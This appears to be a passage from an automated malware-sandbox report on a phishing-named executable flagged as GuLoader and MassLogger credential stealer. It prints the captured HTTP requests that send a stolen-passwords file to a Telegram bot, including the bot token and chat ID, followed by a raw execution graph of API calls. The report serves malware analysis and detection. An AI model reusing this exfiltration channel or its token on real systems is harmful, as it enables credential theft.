                                                                                                                                2024-12-09 07:33:38 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 61 34 31 33 65 35 63 33 31 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1a413e5c3134Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:38 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:38 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:38 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 36 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1314,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729618,"document":{"file_name


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                17192.168.2.949870149.154.167.2204432556C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-09 07:33:41 UTC294OUTPOST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1
                                                                                                                                Content-Type: multipart/form-data; boundary================8dd1a842186c56f
                                                                                                                                Host: api.telegram.org
                                                                                                                                Content-Length: 1090
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-12-09 07:33:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 61 38 34 32 31 38 36 63 35 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                Data Ascii: --===============8dd1a842186c56fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                2024-12-09 07:33:42 UTC388INHTTP/1.1 200 OK
                                                                                                                                Server: nginx/1.18.0
                                                                                                                                Date: Mon, 09 Dec 2024 07:33:42 GMT
                                                                                                                                Content-Type: application/json
                                                                                                                                Content-Length: 538
                                                                                                                                Connection: close
                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                2024-12-09 07:33:42 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 34 36 37 39 33 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 76 61 6e 64 72 6f 7a 7a 7a 78 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 39 37 35 38 35 39 31 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 52 65 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 78 41 62 65 6c 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 37 32 39 36 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65
                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":1315,"from":{"id":7234679344,"is_bot":true,"first_name":"vandrozzzx","username":"vandrozzzx_bot"},"chat":{"id":6897585916,"first_name":"Rex","username":"RexAbel1","type":"private"},"date":1733729622,"document":{"file_name


                                                                                                                                Click to jump to process

                                                                                                                                Click to jump to process

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Click to jump to process

                                                                                                                                Target ID:0
                                                                                                                                Start time:02:31:36
                                                                                                                                Start date:09/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Request for Quotation New collaboration.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:727'801 bytes
                                                                                                                                MD5 hash:1E4847DD3C262A4303261601F0197A42
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2032277835.0000000003E08000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:5
                                                                                                                                Start time:02:32:24
                                                                                                                                Start date:09/12/2024
                                                                                                                                Path:C:\Users\user\Desktop\Request for Quotation New collaboration.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Request for Quotation New collaboration.exe"
                                                                                                                                Imagebase:0x400000
                                                                                                                                File size:727'801 bytes
                                                                                                                                MD5 hash:1E4847DD3C262A4303261601F0197A42
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:false

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:20.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:15.1%
                                                                                                                                  Signature Coverage:18.9%
                                                                                                                                  Total number of Nodes:1508
                                                                                                                                  Total number of Limit Nodes:45
                                                                                                                                  execution_graph 4978 10001000 4981 1000101b 4978->4981 4988 1000152e 4981->4988 4983 10001020 4984 10001024 4983->4984 4985 10001027 GlobalAlloc 4983->4985 4986 10001555 2 API calls 4984->4986 4985->4984 4987 10001019 4986->4987 4989 10001243 3 API calls 4988->4989 4990 10001534 4989->4990 4991 1000153a 4990->4991 4992 10001546 GlobalFree 4990->4992 4991->4983 4992->4983 4993 401d41 GetDC GetDeviceCaps 4994 402b1d 18 API calls 4993->4994 4995 401d5f MulDiv ReleaseDC 4994->4995 4996 402b1d 18 API calls 4995->4996 4997 401d7e 4996->4997 4998 405f0c 18 API calls 4997->4998 4999 401db7 CreateFontIndirectW 4998->4999 5000 4024e8 4999->5000 5001 401a42 5002 402b1d 18 API calls 5001->5002 5003 401a48 5002->5003 5004 402b1d 18 API calls 5003->5004 5005 4019f0 5004->5005 5006 404243 lstrcpynW lstrlenW 5007 402746 5008 402741 5007->5008 5008->5007 5009 402756 FindNextFileW 5008->5009 5010 4027a8 5009->5010 5012 402761 5009->5012 5013 405eea lstrcpynW 5010->5013 5013->5012 5014 401cc6 5015 402b1d 18 API calls 5014->5015 5016 401cd9 SetWindowLongW 5015->5016 5017 4029c7 5016->5017 4137 401dc7 4145 402b1d 4137->4145 4139 401dcd 4140 402b1d 18 API calls 4139->4140 4141 401dd6 4140->4141 4142 401de8 EnableWindow 4141->4142 4143 401ddd ShowWindow 4141->4143 4144 4029c7 4142->4144 4143->4144 4146 405f0c 18 API calls 4145->4146 4147 402b31 4146->4147 4147->4139 5025 4045ca 5026 4045f6 5025->5026 5027 404607 5025->5027 5086 4056aa GetDlgItemTextW 5026->5086 5029 404613 GetDlgItem 5027->5029 5035 404672 5027->5035 5031 404627 5029->5031 5030 404601 5033 40617e 5 API calls 5030->5033 5034 40463b SetWindowTextW 5031->5034 5039 4059e0 4 API calls 5031->5039 5032 404756 5036 4048f7 5032->5036 5088 4056aa GetDlgItemTextW 5032->5088 5033->5027 5040 40412f 19 API calls 5034->5040 5035->5032 5035->5036 5041 405f0c 18 API calls 5035->5041 5038 404196 8 API calls 5036->5038 5046 40490b 5038->5046 5047 404631 5039->5047 5043 404657 5040->5043 5044 4046e6 SHBrowseForFolderW 5041->5044 5042 404786 5045 405a3d 18 API calls 5042->5045 5048 40412f 19 API calls 5043->5048 5044->5032 5049 4046fe CoTaskMemFree 5044->5049 5050 40478c 5045->5050 5047->5034 5053 405935 3 API calls 5047->5053 5051 404665 5048->5051 5052 405935 3 API calls 5049->5052 5089 405eea lstrcpynW 5050->5089 5087 404164 SendMessageW 5051->5087 5055 40470b 5052->5055 5053->5034 5058 404742 SetDlgItemTextW 5055->5058 5062 405f0c 18 API calls 5055->5062 5057 40466b 5060 406254 3 API calls 5057->5060 5058->5032 5059 4047a3 5061 406254 3 API calls 5059->5061 5060->5035 5069 4047ab 5061->5069 5063 40472a lstrcmpiW 5062->5063 5063->5058 5066 40473b lstrcatW 5063->5066 5064 4047ea 5090 405eea lstrcpynW 5064->5090 5066->5058 5067 4047f1 5068 4059e0 4 API calls 5067->5068 5070 4047f7 GetDiskFreeSpaceW 5068->5070 5069->5064 5073 405981 2 API calls 5069->5073 5074 40483c 5069->5074 5072 40481a MulDiv 5070->5072 5070->5074 5072->5074 5073->5069 5075 4048a6 5074->5075 5076 404978 21 API calls 5074->5076 5077 4048c9 5075->5077 5079 40140b 2 API calls 5075->5079 5078 404898 5076->5078 5091 404151 EnableWindow 5077->5091 5081 4048a8 SetDlgItemTextW 5078->5081 5082 40489d 5078->5082 5079->5077 5081->5075 5084 404978 21 API calls 5082->5084 5083 4048e5 5083->5036 5092 40455f 5083->5092 5084->5075 5086->5030 5087->5057 5088->5042 5089->5059 5090->5067 5091->5083 5093 404572 SendMessageW 5092->5093 5094 40456d 5092->5094 5093->5036 5094->5093 5095 401bca 5096 402b1d 18 API calls 5095->5096 5097 401bd1 5096->5097 5098 402b1d 18 API calls 5097->5098 5099 401bdb 5098->5099 5100 401beb 5099->5100 5102 402b3a 18 API calls 5099->5102 5101 401bfb 5100->5101 5103 402b3a 18 API calls 5100->5103 5104 401c06 5101->5104 5105 401c4a 5101->5105 5102->5100 5103->5101 5106 402b1d 18 API calls 5104->5106 5107 402b3a 18 API calls 5105->5107 5108 401c0b 5106->5108 5109 401c4f 5107->5109 5111 402b1d 18 API calls 5108->5111 5110 402b3a 18 API calls 5109->5110 5112 401c58 FindWindowExW 5110->5112 5113 401c14 5111->5113 5116 401c7a 5112->5116 5114 401c3a SendMessageW 5113->5114 5115 401c1c SendMessageTimeoutW 5113->5115 5114->5116 5115->5116 5117 40194b 5118 402b1d 18 API calls 5117->5118 5119 401952 5118->5119 5120 402b1d 18 API calls 5119->5120 5121 40195c 5120->5121 5122 402b3a 18 API calls 5121->5122 5123 401965 5122->5123 5124 401979 lstrlenW 5123->5124 5125 4019b5 5123->5125 5126 401983 5124->5126 5126->5125 5130 405eea lstrcpynW 5126->5130 5128 40199e 5128->5125 5129 4019ab lstrlenW 5128->5129 5129->5125 5130->5128 5134 4042cc 5136 4043fe 5134->5136 5137 4042e4 5134->5137 5135 404468 5138 404472 GetDlgItem 5135->5138 5139 40453a 5135->5139 5136->5135 5136->5139 5143 404439 GetDlgItem SendMessageW 5136->5143 5140 40412f 19 API calls 5137->5140 5141 4044fb 5138->5141 5142 40448c 5138->5142 5145 404196 8 API calls 5139->5145 5144 40434b 5140->5144 5141->5139 5146 40450d 5141->5146 5142->5141 5150 4044b2 6 API calls 5142->5150 5165 404151 EnableWindow 5143->5165 5148 40412f 19 API calls 5144->5148 5149 404535 5145->5149 5151 404523 5146->5151 5152 404513 SendMessageW 5146->5152 5154 404358 CheckDlgButton 5148->5154 5150->5141 5151->5149 5155 404529 SendMessageW 5151->5155 5152->5151 5153 404463 5156 40455f SendMessageW 5153->5156 5163 404151 EnableWindow 5154->5163 5155->5149 5156->5135 5158 404376 GetDlgItem 5164 404164 SendMessageW 5158->5164 5160 40438c SendMessageW 5161 4043b2 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5160->5161 5162 4043a9 GetSysColor 5160->5162 5161->5149 5162->5161 5163->5158 5164->5160 5165->5153 5166 4024cc 5167 402b3a 18 API calls 5166->5167 5168 4024d3 5167->5168 5171 405b56 GetFileAttributesW CreateFileW 5168->5171 5170 4024df 5171->5170 4208 1000278d 4209 100027dd 4208->4209 4210 1000279d VirtualProtect 4208->4210 4210->4209 5172 4019cf 5173 402b3a 18 API calls 5172->5173 5174 4019d6 5173->5174 5175 402b3a 18 API calls 5174->5175 5176 4019df 5175->5176 5177 4019e6 lstrcmpiW 5176->5177 5178 4019f8 lstrcmpW 5176->5178 5179 4019ec 5177->5179 5178->5179 4294 401e51 4295 402b3a 18 API calls 4294->4295 4296 401e57 4295->4296 4297 405194 25 API calls 4296->4297 4298 401e61 4297->4298 4312 405665 CreateProcessW 4298->4312 4301 401ec6 CloseHandle 4305 402793 4301->4305 4302 401e77 WaitForSingleObject 4303 401e89 4302->4303 4304 401e9b GetExitCodeProcess 4303->4304 4315 40628d 4303->4315 4306 401eba 4304->4306 4307 401ead 4304->4307 4306->4301 4310 401eb8 4306->4310 4319 405e31 wsprintfW 4307->4319 4310->4301 4313 401e67 4312->4313 4314 405694 CloseHandle 4312->4314 4313->4301 4313->4302 4313->4305 4314->4313 4316 4062aa PeekMessageW 4315->4316 4317 4062a0 DispatchMessageW 4316->4317 4318 401e90 WaitForSingleObject 4316->4318 4317->4316 4318->4303 4319->4310 4394 401752 4395 402b3a 18 API calls 4394->4395 4396 401759 4395->4396 4397 401781 4396->4397 4398 401779 4396->4398 4435 405eea lstrcpynW 4397->4435 4434 405eea lstrcpynW 4398->4434 4401 40177f 4405 40617e 5 API calls 4401->4405 4402 40178c 4403 405935 3 API calls 4402->4403 4404 401792 lstrcatW 4403->4404 4404->4401 4422 40179e 4405->4422 4406 4017da 4408 405b31 2 API calls 4406->4408 4407 40622d 2 API calls 4407->4422 4408->4422 4410 4017b0 CompareFileTime 4410->4422 4411 401870 4413 405194 25 API calls 4411->4413 4412 401847 4414 405194 25 API calls 4412->4414 4432 40185c 4412->4432 4416 40187a 4413->4416 4414->4432 4415 405eea lstrcpynW 4415->4422 4417 403062 46 API calls 4416->4417 4418 40188d 4417->4418 4419 4018a1 SetFileTime 4418->4419 4420 4018b3 CloseHandle 4418->4420 4419->4420 4423 4018c4 4420->4423 4420->4432 4421 405f0c 18 API calls 4421->4422 4422->4406 4422->4407 4422->4410 4422->4411 4422->4412 4422->4415 4422->4421 4428 4056c6 MessageBoxIndirectW 4422->4428 4433 405b56 GetFileAttributesW CreateFileW 4422->4433 4424 4018c9 4423->4424 4425 4018dc 4423->4425 4426 405f0c 18 API calls 4424->4426 4427 405f0c 18 API calls 4425->4427 4429 4018d1 lstrcatW 4426->4429 4430 4018e4 4427->4430 4428->4422 4429->4430 4431 4056c6 MessageBoxIndirectW 4430->4431 4431->4432 4433->4422 4434->4401 4435->4402 4436 402253 4437 402261 4436->4437 4438 40225b 4436->4438 4439 40226f 4437->4439 4441 402b3a 18 API calls 4437->4441 4440 402b3a 18 API calls 4438->4440 4442 402b3a 18 API calls 4439->4442 4444 40227d 4439->4444 4440->4437 4441->4439 4442->4444 4443 402b3a 18 API calls 4445 402286 WritePrivateProfileStringW 4443->4445 4444->4443 5180 4052d3 5181 4052f4 GetDlgItem GetDlgItem GetDlgItem 5180->5181 5182 40547f 5180->5182 5225 404164 SendMessageW 5181->5225 5184 4054b0 5182->5184 5185 405488 GetDlgItem CreateThread CloseHandle 5182->5185 5187 4054db 5184->5187 5188 405500 5184->5188 5189 4054c7 ShowWindow ShowWindow 5184->5189 5185->5184 5186 405365 5191 40536c GetClientRect GetSystemMetrics SendMessageW SendMessageW 5186->5191 5190 40553b 5187->5190 5193 405515 ShowWindow 5187->5193 5194 4054ef 5187->5194 5195 404196 8 API calls 5188->5195 5227 404164 SendMessageW 5189->5227 5190->5188 5198 405549 SendMessageW 5190->5198 5196 4053db 5191->5196 5197 4053bf SendMessageW SendMessageW 5191->5197 5200 405535 5193->5200 5201 405527 5193->5201 5199 404108 SendMessageW 5194->5199 5207 40550e 5195->5207 5204 4053e0 SendMessageW 5196->5204 5205 4053ee 5196->5205 5197->5196 5206 405562 CreatePopupMenu 5198->5206 5198->5207 5199->5188 5203 404108 SendMessageW 5200->5203 5202 405194 25 API calls 5201->5202 5202->5200 5203->5190 5204->5205 5209 40412f 19 API calls 5205->5209 5208 405f0c 18 API calls 5206->5208 5210 405572 AppendMenuW 5208->5210 5211 4053fe 5209->5211 5212 4055a2 TrackPopupMenu 5210->5212 5213 40558f GetWindowRect 5210->5213 5214 405407 ShowWindow 5211->5214 5215 40543b GetDlgItem SendMessageW 5211->5215 5212->5207 5217 4055bd 5212->5217 5213->5212 5218 40542a 5214->5218 5219 40541d ShowWindow 5214->5219 5215->5207 5216 405462 SendMessageW SendMessageW 5215->5216 5216->5207 5220 4055d9 SendMessageW 5217->5220 5226 404164 SendMessageW 5218->5226 5219->5218 5220->5220 5221 4055f6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5220->5221 5223 40561b SendMessageW 5221->5223 5223->5223 5224 405644 GlobalUnlock SetClipboardData CloseClipboard 5223->5224 5224->5207 5225->5186 5226->5215 5227->5187 5228 402454 5229 402c44 19 API calls 5228->5229 5230 40245e 5229->5230 5231 402b1d 18 API calls 5230->5231 5232 402467 5231->5232 5233 40248b RegEnumValueW 5232->5233 5234 40247f RegEnumKeyW 5232->5234 5236 402793 5232->5236 5235 4024a4 RegCloseKey 5233->5235 5233->5236 5234->5235 5235->5236 5238 401ed4 5239 402b3a 18 API calls 5238->5239 5240 401edb 5239->5240 5241 40622d 2 API calls 5240->5241 5242 401ee1 5241->5242 5244 401ef2 5242->5244 5245 405e31 wsprintfW 5242->5245 5245->5244 5246 4022d5 5247 402305 5246->5247 5248 4022da 5246->5248 5249 402b3a 18 API calls 5247->5249 5250 402c44 19 API calls 5248->5250 5251 40230c 5249->5251 5252 4022e1 5250->5252 5257 402b7a RegOpenKeyExW 5251->5257 5253 402b3a 18 API calls 5252->5253 5256 402322 5252->5256 5254 4022f2 RegDeleteValueW RegCloseKey 5253->5254 5254->5256 5263 402ba5 5257->5263 5266 402bf1 5257->5266 5258 402bcb RegEnumKeyW 5259 402bdd RegCloseKey 5258->5259 5258->5263 5261 406254 3 API calls 5259->5261 5260 402c02 RegCloseKey 5260->5266 5264 402bed 5261->5264 5262 402b7a 3 API calls 5262->5263 5263->5258 5263->5259 5263->5260 5263->5262 5265 402c1d RegDeleteKeyW 5264->5265 5264->5266 5265->5266 5266->5256 4459 403c57 4460 403daa 4459->4460 4461 403c6f 4459->4461 4463 403dfb 4460->4463 4464 403dbb GetDlgItem GetDlgItem 4460->4464 4461->4460 4462 403c7b 4461->4462 4465 403c86 SetWindowPos 4462->4465 4466 403c99 4462->4466 4468 403e55 4463->4468 4473 401389 2 API calls 4463->4473 4467 40412f 19 API calls 4464->4467 4465->4466 4470 403cb6 4466->4470 4471 403c9e ShowWindow 4466->4471 4472 403de5 SetClassLongW 4467->4472 4469 40417b SendMessageW 4468->4469 4490 403da5 4468->4490 4500 403e67 4469->4500 4474 403cd8 4470->4474 4475 403cbe DestroyWindow 4470->4475 4471->4470 4476 40140b 2 API calls 4472->4476 4477 403e2d 4473->4477 4479 403cdd SetWindowLongW 4474->4479 4480 403cee 4474->4480 4478 4040d9 4475->4478 4476->4463 4477->4468 4481 403e31 SendMessageW 4477->4481 4489 4040e9 ShowWindow 4478->4489 4478->4490 4479->4490 4484 403d97 4480->4484 4485 403cfa GetDlgItem 4480->4485 4481->4490 4482 40140b 2 API calls 4482->4500 4483 4040ba DestroyWindow EndDialog 4483->4478 4488 404196 8 API calls 4484->4488 4486 403d2a 4485->4486 4487 403d0d SendMessageW IsWindowEnabled 4485->4487 4492 403d37 4486->4492 4493 403d7e SendMessageW 4486->4493 4494 403d4a 4486->4494 4505 403d2f 4486->4505 4487->4486 4487->4490 4488->4490 4489->4490 4491 405f0c 18 API calls 4491->4500 4492->4493 4492->4505 4493->4484 4497 403d52 4494->4497 4498 403d67 4494->4498 4496 40412f 19 API calls 4496->4500 4502 40140b 2 API calls 4497->4502 4501 40140b 2 API calls 4498->4501 4499 403d65 4499->4484 4500->4482 4500->4483 4500->4490 4500->4491 4500->4496 4504 40412f 19 API calls 4500->4504 4520 403ffa DestroyWindow 4500->4520 4503 403d6e 4501->4503 4502->4505 4503->4484 4503->4505 4506 403ee2 GetDlgItem 4504->4506 4533 404108 4505->4533 4507 403ef7 4506->4507 4508 403eff ShowWindow KiUserCallbackDispatcher 4506->4508 4507->4508 4530 404151 EnableWindow 4508->4530 4510 403f29 EnableWindow 4513 403f3d 4510->4513 4511 403f42 GetSystemMenu EnableMenuItem SendMessageW 4512 403f72 SendMessageW 4511->4512 4511->4513 4512->4513 4513->4511 4531 404164 SendMessageW 4513->4531 4532 405eea lstrcpynW 4513->4532 4516 403fa0 lstrlenW 4517 405f0c 18 API calls 4516->4517 4518 403fb6 SetWindowTextW 4517->4518 4519 401389 2 API calls 4518->4519 4519->4500 4520->4478 4521 404014 CreateDialogParamW 4520->4521 4521->4478 4522 404047 4521->4522 4523 40412f 19 API calls 4522->4523 4524 404052 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4523->4524 4525 401389 2 API calls 4524->4525 4526 404098 4525->4526 4526->4490 4527 4040a0 ShowWindow 4526->4527 4528 40417b SendMessageW 4527->4528 4529 4040b8 4528->4529 4529->4478 4530->4510 4531->4513 4532->4516 4534 404115 SendMessageW 4533->4534 4535 40410f 4533->4535 4534->4499 4535->4534 5267 4014d7 5268 402b1d 18 API calls 5267->5268 5269 4014dd Sleep 5268->5269 5271 4029c7 5269->5271 4759 40335a #17 SetErrorMode OleInitialize 4760 406254 3 API calls 4759->4760 4761 40339d SHGetFileInfoW 4760->4761 4832 405eea lstrcpynW 4761->4832 4763 4033c8 GetCommandLineW 4833 405eea lstrcpynW 4763->4833 4765 4033da GetModuleHandleW 4766 4033f2 4765->4766 4767 405962 CharNextW 4766->4767 4768 403401 CharNextW 4767->4768 4776 403411 4768->4776 4769 4034e6 4770 4034fa GetTempPathW 4769->4770 4834 403326 4770->4834 4772 403512 4773 403516 GetWindowsDirectoryW lstrcatW 4772->4773 4774 40356c DeleteFileW 4772->4774 4777 403326 11 API calls 4773->4777 4842 402dbc GetTickCount GetModuleFileNameW 4774->4842 4775 405962 CharNextW 4775->4776 4776->4769 4776->4775 4782 4034e8 4776->4782 4779 403532 4777->4779 4779->4774 4781 403536 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4779->4781 4780 403580 4783 403618 4780->4783 4786 403608 4780->4786 4790 405962 CharNextW 4780->4790 4785 403326 11 API calls 4781->4785 4926 405eea lstrcpynW 4782->4926 4929 4037c2 4783->4929 4789 403564 4785->4789 4872 4038b4 4786->4872 4789->4774 4789->4783 4794 40359b 4790->4794 4792 403631 4795 4056c6 MessageBoxIndirectW 4792->4795 4793 403727 4796 4037aa ExitProcess 4793->4796 4801 406254 3 API calls 4793->4801 4798 4035e2 4794->4798 4799 403647 lstrcatW lstrcmpiW 4794->4799 4800 40363f ExitProcess 4795->4800 4803 405a3d 18 API calls 4798->4803 4799->4783 4804 403663 CreateDirectoryW SetCurrentDirectoryW 4799->4804 4802 403736 4801->4802 4805 406254 3 API calls 4802->4805 4806 4035ee 4803->4806 4807 403686 4804->4807 4808 40367b 4804->4808 4809 40373f 4805->4809 4806->4783 4927 405eea lstrcpynW 4806->4927 4939 405eea lstrcpynW 4807->4939 4938 405eea lstrcpynW 4808->4938 4812 406254 3 API calls 4809->4812 4814 403748 4812->4814 4816 403796 ExitWindowsEx 4814->4816 4823 403756 GetCurrentProcess 4814->4823 4815 4035fd 4928 405eea lstrcpynW 4815->4928 4816->4796 4819 4037a3 4816->4819 4818 405f0c 18 API calls 4820 4036c5 DeleteFileW 4818->4820 4821 40140b 2 API calls 4819->4821 4822 4036d2 CopyFileW 4820->4822 4829 403694 4820->4829 4821->4796 4822->4829 4826 403766 4823->4826 4824 40371b 4827 405d84 40 API calls 4824->4827 4825 405d84 40 API calls 4825->4829 4826->4816 4827->4783 4828 405f0c 18 API calls 4828->4829 4829->4818 4829->4824 4829->4825 4829->4828 4830 405665 2 API calls 4829->4830 4831 403706 CloseHandle 4829->4831 4830->4829 4831->4829 4832->4763 4833->4765 4835 40617e 5 API calls 4834->4835 4837 403332 4835->4837 4836 40333c 4836->4772 4837->4836 4838 405935 3 API calls 4837->4838 4839 403344 CreateDirectoryW 4838->4839 4940 405b85 4839->4940 4944 405b56 GetFileAttributesW CreateFileW 4842->4944 4844 402dff 4871 402e0c 4844->4871 4945 405eea lstrcpynW 4844->4945 4846 402e22 4847 405981 2 API calls 4846->4847 4848 402e28 4847->4848 4946 405eea lstrcpynW 4848->4946 4850 402e33 GetFileSize 4851 402f34 4850->4851 4870 402e4a 4850->4870 4852 402d1a 33 API calls 4851->4852 4854 402f3b 4852->4854 4853 4032f9 ReadFile 4853->4870 4855 402f77 GlobalAlloc 4854->4855 4854->4871 4948 40330f SetFilePointer 4854->4948 4858 402f8e 4855->4858 4856 402fcf 4859 402d1a 33 API calls 4856->4859 4863 405b85 2 API calls 4858->4863 4859->4871 4860 402f58 4861 